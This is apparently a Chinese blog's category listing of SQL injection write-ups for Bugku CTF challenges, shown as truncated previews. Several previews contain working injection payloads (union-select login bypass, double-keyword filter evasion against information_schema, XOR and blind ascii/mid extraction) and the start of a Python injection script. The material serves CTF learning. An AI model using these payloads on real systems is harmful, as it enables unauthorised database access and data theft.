
SQL注入
偷一个月亮
爱搞事的web狗~
展开
-
bugku-INSERT INTO注入(附代码) 详细
# -*-coding:utf-8-*-# author : wen# flag:wen{b7bb30b3435f2e7c418b131f9e789f81}import requestsimport timeurl = 'http://123.206.87.240:8002/web15/'payload = 'abcdefghigklmnopqrstuvwxyzABCDEFGHI...原创 2019-06-19 21:32:36 · 698 阅读 · 0 评论 -
bugku-这是一个神奇的登陆框(附代码)(详细)
题目链接:http://123.206.87.240:9001/sql/数据库表名列名select flag代码admin_name=admin" union select database(),database() #&admin_passwd=12345&submit=GO+GO+GOadmin_name=admin" union select (s...原创 2019-06-20 12:29:05 · 922 阅读 · 0 评论 -
bugku-多次 (详细)
第一个考点:异或注入判断过滤关键字?id=1’^(length(‘union’)!=0)–+过滤的用双写绕过GET /1ndex.php?id=-1' ununionion selselectect 2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=0x7765623130...原创 2019-06-20 14:55:19 · 1894 阅读 · 0 评论 -
bugku-sql注入2 (附详细代码)
构造select * from * where uname = $_POST[uname]uname=admin’-’此时uname=-1,不行$sql = select * from users where username=$username;在字符串username的值和数字0比较的时候,字符串变为了0故此0=0payload:admin’-(ascii(mid(R...原创 2019-06-20 22:14:42 · 2004 阅读 · 2 评论 -
php二次注入
原创 2019-07-03 20:09:45 · 294 阅读 · 0 评论 -
bugku login2
原创 2019-06-29 08:27:04 · 1019 阅读 · 0 评论 -
bugku-实战2-注入
news存在注入点,4个字段select tables 发现表太多了,显示不全这时用字符截断函数get flag原创 2019-06-29 08:31:39 · 351 阅读 · 0 评论